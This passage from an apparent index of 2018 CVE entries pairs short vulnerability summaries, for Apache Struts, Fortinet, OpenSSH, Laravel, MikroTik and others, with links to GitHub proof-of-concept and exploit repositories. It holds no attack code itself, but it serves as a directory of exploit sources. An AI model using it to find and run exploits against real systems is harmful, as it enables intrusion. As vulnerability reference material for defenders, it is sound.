'false'. + + +- [ivanitlearning/CVE-2018-11770](https://github.com/ivanitlearning/CVE-2018-11770) + +### CVE-2018-11776 (2018-08-22) + +Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace. + + +- [xfox64x/CVE-2018-11776](https://github.com/xfox64x/CVE-2018-11776) +- [jiguangsdf/CVE-2018-11776](https://github.com/jiguangsdf/CVE-2018-11776) +- [hook-s3c/CVE-2018-11776-Python-PoC](https://github.com/hook-s3c/CVE-2018-11776-Python-PoC) +- [mazen160/struts-pwn_CVE-2018-11776](https://github.com/mazen160/struts-pwn_CVE-2018-11776) +- [bhdresh/CVE-2018-11776](https://github.com/bhdresh/CVE-2018-11776) +- [knqyf263/CVE-2018-11776](https://github.com/knqyf263/CVE-2018-11776) +- [Ekultek/Strutter](https://github.com/Ekultek/Strutter) +- [tuxotron/cve-2018-11776-docker](https://github.com/tuxotron/cve-2018-11776-docker) +- [brianwrf/S2-057-CVE-2018-11776](https://github.com/brianwrf/S2-057-CVE-2018-11776) +- [649/Apache-Struts-Shodan-Exploit](https://github.com/649/Apache-Struts-Shodan-Exploit) +- [jezzus/CVE-2018-11776-Python-PoC](https://github.com/jezzus/CVE-2018-11776-Python-PoC) +- [cved-sources/cve-2018-11776](https://github.com/cved-sources/cve-2018-11776) +- [OzNetNerd/apche-struts-vuln-demo-cve-2018-11776](https://github.com/OzNetNerd/apche-struts-vuln-demo-cve-2018-11776) +- [cucadili/CVE-2018-11776](https://github.com/cucadili/CVE-2018-11776) +- [ArunBhandarii/Apache-Struts-0Day-Exploit](https://github.com/ArunBhandarii/Apache-Struts-0Day-Exploit) +- [freshdemo/ApacheStruts-CVE-2018-11776](https://github.com/freshdemo/ApacheStruts-CVE-2018-11776) +- [sonpt-afk/CVE-2018-11776-FIS](https://github.com/sonpt-afk/CVE-2018-11776-FIS) + +### CVE-2018-11784 (2018-10-04) + +When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice. + + +- [Cappricio-Securities/CVE-2018-11784](https://github.com/Cappricio-Securities/CVE-2018-11784) + +### CVE-2018-11788 (2019-01-07) + +Apache Karaf provides a features deployer, which allows users to "hot deploy" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by XMLInputFactory class. Apache Karaf XMLInputFactory class doesn't contain any mitigation codes against XXE. This is a potential security risk as an user can inject external XML entities in Apache Karaf version prior to 4.1.7 or 4.2.2. It has been fixed in Apache Karaf 4.1.7 and 4.2.2 releases. + + +- [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) + +### CVE-2018-11790 (2019-01-31) + +When loading a document with Apache Open Office 4.1.5 and earlier with smaller end line termination than the operating system uses, the defect occurs. In this case OpenOffice runs into an Arithmetic Overflow at a string length calculation. + + +- [anmuxi-bai/CVE-2018-11790](https://github.com/anmuxi-bai/CVE-2018-11790) + +### CVE-2018-12018 (2018-07-05) + +The GetBlockHeadersMsg handler in the LES protocol implementation in Go Ethereum (aka geth) before 1.8.11 may lead to an access violation because of an integer signedness error for the array index, which allows attackers to launch a Denial of Service attack by sending a packet with a -1 query.Skip value. The vulnerable remote node would be crashed by such an attack immediately, aka the EPoD (Ethereum Packet of Death) issue. + + +- [k3v142/CVE-2018-12018](https://github.com/k3v142/CVE-2018-12018) + +### CVE-2018-12031 (2018-06-07) + +Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via server/node_upgrade_srv.js directory traversal with the firmware parameter in a downloadFirmware action. + + +- [EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion](https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion) + +### CVE-2018-12038 (2018-11-20) + +An issue was discovered on Samsung 840 EVO devices. Vendor-specific commands may allow access to the disk-encryption key. + + +- [gdraperi/remote-bitlocker-encryption-report](https://github.com/gdraperi/remote-bitlocker-encryption-report) + +### CVE-2018-12086 (2018-09-14) + +Buffer overflow in OPC UA applications allows remote attackers to trigger a stack overflow with carefully structured requests. + + +- [kevinherron/stack-overflow-poc](https://github.com/kevinherron/stack-overflow-poc) + +### CVE-2018-12326 (2018-06-17) + +Buffer overflow in redis-cli of Redis before 4.0.10 and 5.x before 5.0 RC3 allows an attacker to achieve code execution and escalate to higher privileges via a crafted command line. NOTE: It is unclear whether there are any common situations in which redis-cli is used with, for example, a -h (aka hostname) argument from an untrusted source. + + +- [spasm5/CVE-2018-12326](https://github.com/spasm5/CVE-2018-12326) + +### CVE-2018-12386 (2018-10-18) + +A vulnerability in register allocation in JavaScript can lead to type confusion, allowing for an arbitrary read and write. This leads to remote code execution inside the sandboxed content process when triggered. This vulnerability affects Firefox ESR < 60.2.2 and Firefox < 62.0.3. + + +- [Hydra3evil/cve-2018-12386](https://github.com/Hydra3evil/cve-2018-12386) +- [0xLyte/cve-2018-12386](https://github.com/0xLyte/cve-2018-12386) + +### CVE-2018-12418 (2018-06-14) + +Archive.java in Junrar before 1.0.1, as used in Apache Tika and other products, is affected by a denial of service vulnerability due to an infinite loop when handling corrupt RAR files. + + +- [tafamace/CVE-2018-12418](https://github.com/tafamace/CVE-2018-12418) + +### CVE-2018-12421 (2018-06-14) + +LTB (aka LDAP Tool Box) Self Service Password before 1.3 allows a change to a user password (without knowing the old password) via a crafted POST request, because the ldap_bind return value is mishandled and the PHP data type is not constrained to be a string. + + +- [reversebrain/CVE-2018-12421](https://github.com/reversebrain/CVE-2018-12421) + +### CVE-2018-12463 (2018-07-12) + +An XML external entity (XXE) vulnerability in Fortify Software Security Center (SSC), version 17.1, 17.2, 18.1 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request. + + +- [alt3kx/CVE-2018-12463](https://github.com/alt3kx/CVE-2018-12463) + +### CVE-2018-12533 (2018-06-18) + +JBoss RichFaces 3.1.0 through 3.3.4 allows unauthenticated remote attackers to inject expression language (EL) expressions and execute arbitrary Java code via a /DATA/ substring in a path with an org.richfaces.renderkit.html.Paint2DResource$ImageData object, aka RF-14310. + + +- [llamaonsecurity/CVE-2018-12533](https://github.com/llamaonsecurity/CVE-2018-12533) +- [Pastea/CVE-2018-12533](https://github.com/Pastea/CVE-2018-12533) + +### CVE-2018-12537 (2018-08-14) + +In Eclipse Vert.x version 3.0 to 3.5.1, the HttpServer response headers and HttpClient request headers do not filter carriage return and line feed characters from the header value. This allow unfiltered values to inject a new header in the client request or server response. + + +- [tafamace/CVE-2018-12537](https://github.com/tafamace/CVE-2018-12537) + +### CVE-2018-12540 (2018-07-12) + +In version from 3.0.0 to 3.5.2 of Eclipse Vert.x, the CSRFHandler do not assert that the XSRF Cookie matches the returned XSRF header/form parameter. This allows replay attacks with previously issued tokens which are not expired yet. + + +- [bernard-wagner/vertx-web-xsrf](https://github.com/bernard-wagner/vertx-web-xsrf) +- [tafamace/CVE-2018-12540](https://github.com/tafamace/CVE-2018-12540) + +### CVE-2018-12596 (2018-10-10) + +Episerver Ektron CMS before 9.0 SP3 Site CU 31, 9.1 before SP3 Site CU 45, or 9.2 before SP2 Site CU 22 allows remote attackers to call aspx pages via the "activateuser.aspx" page, even if a page is located under the /WorkArea/ path, which is forbidden (normally available exclusively for local admins). + + +- [alt3kx/CVE-2018-12596](https://github.com/alt3kx/CVE-2018-12596) + +### CVE-2018-12597 +- [alt3kx/CVE-2018-12597](https://github.com/alt3kx/CVE-2018-12597) + +### CVE-2018-12598 +- [alt3kx/CVE-2018-12598](https://github.com/alt3kx/CVE-2018-12598) + +### CVE-2018-12613 (2018-06-21) + +An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). + + +- [0x00-0x00/CVE-2018-12613](https://github.com/0x00-0x00/CVE-2018-12613) +- [ivanitlearning/CVE-2018-12613](https://github.com/ivanitlearning/CVE-2018-12613) +- [eastmountyxz/CVE-2018-12613-phpMyAdmin](https://github.com/eastmountyxz/CVE-2018-12613-phpMyAdmin) + +### CVE-2018-12636 (2018-06-22) + +The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page. + + +- [nth347/CVE-2018-12636_exploit](https://github.com/nth347/CVE-2018-12636_exploit) + +### CVE-2018-12798 (2018-07-20) + +Adobe Acrobat and Reader 2018.011.20040 and earlier, 2017.011.30080 and earlier, and 2015.006.30418 and earlier versions have a Heap Overflow vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user. + + +- [sharmasandeepkr/cve-2018-12798](https://github.com/sharmasandeepkr/cve-2018-12798) + +### CVE-2018-12895 (2018-06-26) + +WordPress through 4.9.6 allows Author users to execute arbitrary code by leveraging directory traversal in the wp-admin/post.php thumb parameter, which is passed to the PHP unlink function and can delete the wp-config.php file. This is related to missing filename validation in the wp-includes/post.php wp_delete_attachment function. The attacker must have capabilities for files and posts that are normally available only to the Author, Editor, and Administrator roles. The attack methodology is to delete wp-config.php and then launch a new installation process to increase the attacker's privileges. + + +- [bloom-ux/cve-2018-12895-hotfix](https://github.com/bloom-ux/cve-2018-12895-hotfix) + +### CVE-2018-13257 (2019-11-18) + +The bb-auth-provider-cas authentication module within Blackboard Learn 2018-07-02 is susceptible to HTTP host header spoofing during Central Authentication Service (CAS) service ticket validation, enabling a phishing attack from the CAS server login page. + + +- [gluxon/CVE-2018-13257](https://github.com/gluxon/CVE-2018-13257) + +### CVE-2018-13341 (2018-08-10) + +Crestron TSW-X60 all versions prior to 2.001.0037.001 and MC3 all versions prior to 1.502.0047.00, The passwords for special sudo accounts may be calculated using information accessible to those with regular user privileges. Attackers could decipher these passwords, which may allow them to execute hidden API calls and escape the CTP console sandbox environment with elevated privileges. + + +- [axcheron/crestron_getsudopwd](https://github.com/axcheron/crestron_getsudopwd) +- [RajChowdhury240/CVE-2018-13341](https://github.com/RajChowdhury240/CVE-2018-13341) + +### CVE-2018-13379 (2019-06-04) + +An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests. + + +- [milo2012/CVE-2018-13379](https://github.com/milo2012/CVE-2018-13379) +- [jpiechowka/at-doom-fortigate](https://github.com/jpiechowka/at-doom-fortigate) +- [0xHunter/FortiOS-Credentials-Disclosure](https://github.com/0xHunter/FortiOS-Credentials-Disclosure) +- [Blazz3/cve2018-13379-nmap-script](https://github.com/Blazz3/cve2018-13379-nmap-script) +- [yukar1z0e/CVE-2018-13379](https://github.com/yukar1z0e/CVE-2018-13379) +- [pwn3z/CVE-2018-13379-FortinetVPN](https://github.com/pwn3z/CVE-2018-13379-FortinetVPN) +- [k4nfr3/CVE-2018-13379-Fortinet](https://github.com/k4nfr3/CVE-2018-13379-Fortinet) +- [Zeop-CyberSec/fortios_vpnssl_traversal_leak](https://github.com/Zeop-CyberSec/fortios_vpnssl_traversal_leak) +- [B1anda0/CVE-2018-13379](https://github.com/B1anda0/CVE-2018-13379) +- [nivdolgin/CVE-2018-13379](https://github.com/nivdolgin/CVE-2018-13379) +- [Farzan-Kh/CVE-2018-13379](https://github.com/Farzan-Kh/CVE-2018-13379) + +### CVE-2018-13382 (2019-06-04) + +An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests + + +- [milo2012/CVE-2018-13382](https://github.com/milo2012/CVE-2018-13382) +- [tumikoto/Exploit-FortinetMagicBackdoor](https://github.com/tumikoto/Exploit-FortinetMagicBackdoor) + +### CVE-2018-13410 (2018-07-06) + +Info-ZIP Zip 3.0, when the -T and -TT command-line options are used, allows attackers to cause a denial of service (invalid free and application crash) or possibly have unspecified other impact because of an off-by-one error. NOTE: it is unclear whether there are realistic scenarios in which an untrusted party controls the -TT value, given that the entire purpose of -TT is execution of arbitrary commands + + +- [shinecome/zip](https://github.com/shinecome/zip) + +### CVE-2018-13784 (2018-07-09) + +PrestaShop before 1.6.1.20 and 1.7.x before 1.7.3.4 mishandles cookie encryption in Cookie.php, Rinjdael.php, and Blowfish.php. + + +- [ambionics/prestashop-exploits](https://github.com/ambionics/prestashop-exploits) + +### CVE-2018-13797 (2018-07-10) + +The macaddress module before 0.2.9 for Node.js is prone to an arbitrary command injection flaw, due to allowing unsanitized input to an exec (rather than execFile) call. + + +- [dsp-testing/CVE-2018-13797](https://github.com/dsp-testing/CVE-2018-13797) + +### CVE-2018-13864 (2018-07-17) + +A directory traversal vulnerability has been found in the Assets controller in Play Framework 2.6.12 through 2.6.15 (fixed in 2.6.16) when running on Windows. It allows a remote attacker to download arbitrary files from the target server via specially crafted HTTP requests. + + +- [tafamace/CVE-2018-13864](https://github.com/tafamace/CVE-2018-13864) + +### CVE-2018-14009 (2018-07-12) + +Codiad through 2.8.4 allows Remote Code Execution, a different vulnerability than CVE-2017-11366 and CVE-2017-15689. + + +- [hidog123/Codiad-CVE-2018-14009](https://github.com/hidog123/Codiad-CVE-2018-14009) + +### CVE-2018-14040 (2018-07-13) + +In Bootstrap before 4.1.2, XSS is possible in the collapse data-parent attribute. + + +- [Snorlyd/https-nj.gov---CVE-2018-14040](https://github.com/Snorlyd/https-nj.gov---CVE-2018-14040) + +### CVE-2018-14041 (2018-07-13) + +In Bootstrap before 4.1.2, XSS is possible in the data-target property of scrollspy. + + +- [Snorlyd/https-nj.gov---CVE-2018-14041](https://github.com/Snorlyd/https-nj.gov---CVE-2018-14041) + +### CVE-2018-14042 (2018-07-13) + +In Bootstrap before 4.1.2, XSS is possible in the data-container property of tooltip. + + +- [Snorlyd/https-nj.gov---CVE-2018-14042](https://github.com/Snorlyd/https-nj.gov---CVE-2018-14042) + +### CVE-2018-14083 (2018-07-25) + +LICA miniCMTS E8K(u/i/...) devices allow remote attackers to obtain sensitive information via a direct POST request for the inc/user.ini file, leading to discovery of a password hash. + + +- [pudding2/CVE-2018-14083](https://github.com/pudding2/CVE-2018-14083) + +### CVE-2018-14442 (2018-07-20) + +Foxit Reader before 9.2 and PhantomPDF before 9.2 have a Use-After-Free that leads to Remote Code Execution, aka V-88f4smlocs. + + +- [payatu/CVE-2018-14442](https://github.com/payatu/CVE-2018-14442) +- [sharmasandeepkr/PS-2018-002---CVE-2018-14442](https://github.com/sharmasandeepkr/PS-2018-002---CVE-2018-14442) + +### CVE-2018-14463 (2019-10-03) + +The VRRP parser in tcpdump before 4.9.3 has a buffer over-read in print-vrrp.c:vrrp_print() for VRRP version 2, a different vulnerability than CVE-2019-15167. + + +- [hshivhare67/platform_external_tcpdump_AOSP10_r33_4.9.2-_CVE-2018-14463](https://github.com/hshivhare67/platform_external_tcpdump_AOSP10_r33_4.9.2-_CVE-2018-14463) + +### CVE-2018-14469 (2019-10-03) + +The IKEv1 parser in tcpdump before 4.9.3 has a buffer over-read in print-isakmp.c:ikev1_n_print(). + + +- [Trinadh465/external_tcpdump_CVE-2018-14469](https://github.com/Trinadh465/external_tcpdump_CVE-2018-14469) + +### CVE-2018-14634 (2018-09-25) + +An integer overflow flaw was found in the Linux kernel's create_elf_tables() function. An unprivileged local user with access to SUID (or otherwise privileged) binary could use this flaw to escalate their privileges on the system. Kernel versions 2.6.x, 3.10.x and 4.14.x are believed to be vulnerable. + + +- [luan0ap/cve-2018-14634](https://github.com/luan0ap/cve-2018-14634) + +### CVE-2018-14665 (2018-10-25) + +A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges. + + +- [jas502n/CVE-2018-14665](https://github.com/jas502n/CVE-2018-14665) +- [bolonobolo/CVE-2018-14665](https://github.com/bolonobolo/CVE-2018-14665) + +### CVE-2018-14667 (2018-11-06) + +The RichFaces Framework 3.X through 3.3.4 is vulnerable to Expression Language (EL) injection via the UserResource resource. A remote, unauthenticated attacker could exploit this to execute arbitrary code using a chain of java serialized objects via org.ajax4jsf.resource.UserResource$UriData. + + +- [nareshmail/cve-2018-14667](https://github.com/nareshmail/cve-2018-14667) +- [zeroto01/CVE-2018-14667](https://github.com/zeroto01/CVE-2018-14667) +- [r00t4dm/CVE-2018-14667](https://github.com/r00t4dm/CVE-2018-14667) +- [syriusbughunt/CVE-2018-14667](https://github.com/syriusbughunt/CVE-2018-14667) +- [quandqn/cve-2018-14667](https://github.com/quandqn/cve-2018-14667) +- [Venscor/CVE-2018-14667-poc](https://github.com/Venscor/CVE-2018-14667-poc) + +### CVE-2018-14699 (2018-12-03) + +System command injection in the /DroboAccess/enable_user endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to execute system commands via the "username" URL parameter. + + +- [RevoCain/CVE-2018-14699](https://github.com/RevoCain/CVE-2018-14699) + +### CVE-2018-14714 (2019-05-13) + +System command injection in appGet.cgi on ASUS RT-AC3200 version 3.0.0.4.382.50010 allows attackers to execute system commands via the "load_script" URL parameter. + + +- [tin-z/CVE-2018-14714-POC](https://github.com/tin-z/CVE-2018-14714-POC) +- [sunn1day/CVE-2018-14714-POC](https://github.com/sunn1day/CVE-2018-14714-POC) +- [BTtea/CVE-2018-14714-RCE-exploit](https://github.com/BTtea/CVE-2018-14714-RCE-exploit) + +### CVE-2018-14716 (2018-08-06) + +A Server Side Template Injection (SSTI) was discovered in the SEOmatic plugin before 3.1.4 for Craft CMS, because requests that don't match any elements incorrectly generate the canonicalUrl, and can lead to execution of Twig code. + + +- [0xB455/CVE-2018-14716](https://github.com/0xB455/CVE-2018-14716) + +### CVE-2018-14729 (2019-05-22) + +The database backup feature in upload/source/admincp/admincp_db.php in Discuz! 2.5 and 3.4 allows remote attackers to execute arbitrary PHP code. + + +- [c0010/CVE-2018-14729](https://github.com/c0010/CVE-2018-14729) + +### CVE-2018-14772 (2018-10-16) + +Pydio 4.2.1 through 8.2.1 has an authenticated remote code execution vulnerability in which an attacker with administrator access to the web application can execute arbitrary code on the underlying system via Command Injection. + + +- [killvxk/CVE-2018-14772](https://github.com/killvxk/CVE-2018-14772) + +### CVE-2018-14847 (2018-08-02) + +MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface. + + +- [BasuCert/WinboxPoC](https://github.com/BasuCert/WinboxPoC) +- [msterusky/WinboxExploit](https://github.com/msterusky/WinboxExploit) +- [syrex1013/MikroRoot](https://github.com/syrex1013/MikroRoot) +- [jas502n/CVE-2018-14847](https://github.com/jas502n/CVE-2018-14847) +- [mahmoodsabir/mikrotik-beast](https://github.com/mahmoodsabir/mikrotik-beast) +- [Tr33-He11/winboxPOC](https://github.com/Tr33-He11/winboxPOC) +- [sinichi449/Python-MikrotikLoginExploit](https://github.com/sinichi449/Python-MikrotikLoginExploit) +- [yukar1z0e/CVE-2018-14847](https://github.com/yukar1z0e/CVE-2018-14847) +- [hacker30468/Mikrotik-router-hack](https://github.com/hacker30468/Mikrotik-router-hack) +- [babyshen/routeros-CVE-2018-14847-bytheway](https://github.com/babyshen/routeros-CVE-2018-14847-bytheway) +- [K3ysTr0K3R/CVE-2018-14847-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2018-14847-EXPLOIT) + +### CVE-2018-14879 (2019-10-03) + +The command-line argument parser in tcpdump before 4.9.3 has a buffer overflow in tcpdump.c:get_next_file(). + + +- [Trinadh465/external_tcpdump_CVE-2018-14879](https://github.com/Trinadh465/external_tcpdump_CVE-2018-14879) + +### CVE-2018-14880 (2019-10-03) + +The OSPFv3 parser in tcpdump before 4.9.3 has a buffer over-read in print-ospf6.c:ospf6_print_lshdr(). + + +- [Trinadh465/external_tcpdump_CVE-2018-14880](https://github.com/Trinadh465/external_tcpdump_CVE-2018-14880) + +### CVE-2018-15131 (2019-05-30) + +An issue was discovered in Synacor Zimbra Collaboration Suite 8.6.x before 8.6.0 Patch 11, 8.7.x before 8.7.11 Patch 6, 8.8.x before 8.8.8 Patch 9, and 8.8.9 before 8.8.9 Patch 3. Account number enumeration is possible via inconsistent responses for specific types of authentication requests. + + +- [0x00-0x00/CVE-2018-15131](https://github.com/0x00-0x00/CVE-2018-15131) + +### CVE-2018-15133 (2018-08-09) + +In Laravel Framework through 5.5.40 and 5.6.x through 5.6.29, remote code execution might occur as a result of an unserialize call on a potentially untrusted X-XSRF-TOKEN value. This involves the decrypt method in Illuminate/Encryption/Encrypter.php and PendingBroadcast in gadgetchains/Laravel/RCE/3/chain.php in phpggc. The attacker must know the application key, which normally would never occur, but could happen if the attacker previously had privileged access or successfully accomplished a previous attack. + + +- [kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133) +- [Bilelxdz/Laravel-CVE-2018-15133](https://github.com/Bilelxdz/Laravel-CVE-2018-15133) +- [Prabesh01/Laravel-PHP-Unit-RCE-Auto-shell-uploader](https://github.com/Prabesh01/Laravel-PHP-Unit-RCE-Auto-shell-uploader) +- [bukitbarisan/laravel-rce-cve-2018-15133](https://github.com/bukitbarisan/laravel-rce-cve-2018-15133) +- [AlienX2001/better-poc-for-CVE-2018-15133](https://github.com/AlienX2001/better-poc-for-CVE-2018-15133) +- [aljavier/exploit_laravel_cve-2018-15133](https://github.com/aljavier/exploit_laravel_cve-2018-15133) +- [pwnedshell/Larascript](https://github.com/pwnedshell/Larascript) +- [AzhariKun/CVE-2018-15133](https://github.com/AzhariKun/CVE-2018-15133) +- [NatteeSetobol/CVE-2018-15133-Lavel-Expliot](https://github.com/NatteeSetobol/CVE-2018-15133-Lavel-Expliot) +- [Cr4zyD14m0nd137/Lab-for-cve-2018-15133](https://github.com/Cr4zyD14m0nd137/Lab-for-cve-2018-15133) +- [0xSalle/cve-2018-15133](https://github.com/0xSalle/cve-2018-15133) + +### CVE-2018-15139 (2018-08-13) + +Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory. + + +- [sec-it/exploit-CVE-2018-15139](https://github.com/sec-it/exploit-CVE-2018-15139) + +### CVE-2018-15365 (2018-09-28) + +A Reflected Cross-Site Scripting (XSS) vulnerability in Trend Micro Deep Discovery Inspector 3.85 and below could allow an attacker to bypass CSRF protection and conduct an attack on vulnerable installations. An attacker must be an authenticated user in order to exploit the vulnerability. + + +- [nixwizard/CVE-2018-15365](https://github.com/nixwizard/CVE-2018-15365) + +### CVE-2018-15473 (2018-08-17) + +OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. + + +- [trimstray/massh-enum](https://github.com/trimstray/massh-enum) +- [gbonacini/opensshenum](https://github.com/gbonacini/opensshenum) +- [Rhynorater/CVE-2018-15473-Exploit](https://github.com/Rhynorater/CVE-2018-15473-Exploit) +- [epi052/cve-2018-15473](https://github.com/epi052/cve-2018-15473) +- [pyperanger/CVE-2018-15473_exploit](https://github.com/pyperanger/CVE-2018-15473_exploit) +- [r3dxpl0it/CVE-2018-15473](https://github.com/r3dxpl0it/CVE-2018-15473) +- [JoeBlackSecurity/SSHUsernameBruter-SSHUB](https://github.com/JoeBlackSecurity/SSHUsernameBruter-SSHUB) +- [cved-sources/cve-2018-15473](https://github.com/cved-sources/cve-2018-15473) +- [LINYIKAI/CVE-2018-15473-exp](https://github.com/LINYIKAI/CVE-2018-15473-exp) +- [trickster1103/-](https://github.com/trickster1103/-) +- [NHPT/SSH-account-enumeration-verification-script](https://github.com/NHPT/SSH-account-enumeration-verification-script) +- [CaioCGH/EP4-redes](https://github.com/CaioCGH/EP4-redes) +- [Moon1705/easy_security](https://github.com/Moon1705/easy_security) +- [An0nYm0u5101/enumpossible](https://github.com/An0nYm0u5101/enumpossible) +- [Wh1t3Fox/cve-2018-15473](https://github.com/Wh1t3Fox/cve-2018-15473) +- [1stPeak/CVE-2018-15473](https://github.com/1stPeak/CVE-2018-15473) +- [coollce/CVE-2018-15473_burte](https://github.com/coollce/CVE-2018-15473_burte) +- [Dirty-Racoon/CVE-2018-15473-py3](https://github.com/Dirty-Racoon/CVE-2018-15473-py3) +- [Sait-Nuri/CVE-2018-15473](https://github.com/Sait-Nuri/CVE-2018-15473) +- [WildfootW/CVE-2018-15473_OpenSSH_7.7](https://github.com/WildfootW/CVE-2018-15473_OpenSSH_7.7) +- [MrDottt/CVE-2018-15473](https://github.com/MrDottt/CVE-2018-15473) +- [66quentin/shodan-CVE-2018-15473](https://github.com/66quentin/shodan-CVE-2018-15473) +- [0xrobiul/CVE-2018-15473](https://github.com/0xrobiul/CVE-2018-15473) +- [philippedixon/CVE-2018-15473](https://github.com/philippedixon/CVE-2018-15473) +- [sergiovks/SSH-User-Enum-Python3-CVE-2018-15473](https://github.com/sergiovks/SSH-User-Enum-Python3-CVE-2018-15473) +- [Anonimo501/ssh_enum_users_CVE-2018-15473](https://github.com/Anonimo501/ssh_enum_users_CVE-2018-15473) +- [mclbn/docker-cve-2018-15473](https://github.com/mclbn/docker-cve-2018-15473) +- [GaboLC98/userenum-CVE-2018-15473](https://github.com/GaboLC98/userenum-CVE-2018-15473) +- [4xolotl/CVE-2018-15473](https://github.com/4xolotl/CVE-2018-15473) +- [NestyF/SSH_Enum_CVE-2018-15473](https://github.com/NestyF/SSH_Enum_CVE-2018-15473) +- [yZ1337/CVE-2018-15473](https://github.com/yZ1337/CVE-2018-15473) +- [MahdiOsman/CVE-2018-15473-SNMPv1-2-Community-String-Vulnerability-Testing](https://github.com/MahdiOsman/CVE-2018-15473-SNMPv1-2-Community-String-Vulnerability-Testing) +- [SUDORM0X/PoC-CVE-2018-15473](https://github.com/SUDORM0X/PoC-CVE-2018-15473) + +### CVE-2018-15499 (2018-08-24) + +GEAR Software products that include GEARAspiWDM.sys, 2.2.5.0, allow local users to cause a denial of service (Race Condition and BSoD on Windows) by not checking that user-mode memory is available right before writing to it. A check is only performed at the beginning of a long subroutine. + + +- [DownWithUp/CVE-2018-15499](https://github.com/DownWithUp/CVE-2018-15499) + +### CVE-2018-15686 (2018-10-26) + +A vulnerability in unit_deserialize of systemd allows an attacker to supply arbitrary state across systemd re-execution via NotifyAccess. This can be used to improperly influence systemd execution and possibly lead to root privilege escalation. Affected releases are systemd versions up to and including 239. + + +- [hpcprofessional/remediate_cesa_2019_2091](https://github.com/hpcprofessional/remediate_cesa_2019_2091) + +### CVE-2018-15708 (2018-11-14) + +Snoopy 1.0 in Nagios XI 5.5.6 allows remote unauthenticated attackers to execute arbitrary commands via a crafted HTTP request. + + +- [lkduy2602/Detecting-CVE-2018-15708-Vulnerabilities](https://github.com/lkduy2602/Detecting-CVE-2018-15708-Vulnerabilities) + +### CVE-2018-15727 (2018-08-29) + +Grafana 2.x, 3.x, and 4.x before 4.6.4 and 5.x before 5.2.3 allows authentication bypass because an attacker can generate a valid "remember me" cookie knowing only a username of an LDAP or OAuth user. + + +- [u238/grafana-CVE-2018-15727](https://github.com/u238/grafana-CVE-2018-15727) +- [grimbelhax/CVE-2018-15727](https://github.com/grimbelhax/CVE-2018-15727) + +### CVE-2018-15832 (2018-09-20) + +upc.exe in Ubisoft Uplay Desktop Client versions 63.0.5699.0 allows remote attackers to execute arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of URI handlers. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code under the context of the current process. + + +- [JacksonKuo/Ubisoft-Uplay-Desktop-Client-63.0.5699.0](https://github.com/JacksonKuo/Ubisoft-Uplay-Desktop-Client-63.0.5699.0) + +### CVE-2018-15835 (2018-11-30) + +Android 1.0 through 9.0 has Insecure Permissions. The Android bug ID is 77286983. + + +- [Chirantar7004/Android-Passive-Location-Tracker](https://github.com/Chirantar7004/Android-Passive-Location-Tracker) + +### CVE-2018-15877 (2018-08-26) + +The Plainview Activity Monitor plugin before 20180826 for WordPress is vulnerable to OS command injection via shell metacharacters in the ip parameter of a wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools request. + + +- [cved-sources/cve-2018-15877](https://github.com/cved-sources/cve-2018-15877) +- [Cinnamon1212/CVE-2018-15877-RCE](https://github.com/Cinnamon1212/CVE-2018-15877-RCE) + +### CVE-2018-15912 (2018-08-29) + +An issue was discovered in manjaro-update-system.sh in manjaro-system 20180716-1 on Manjaro Linux. A local attacker can install or remove arbitrary packages and package repositories potentially containing 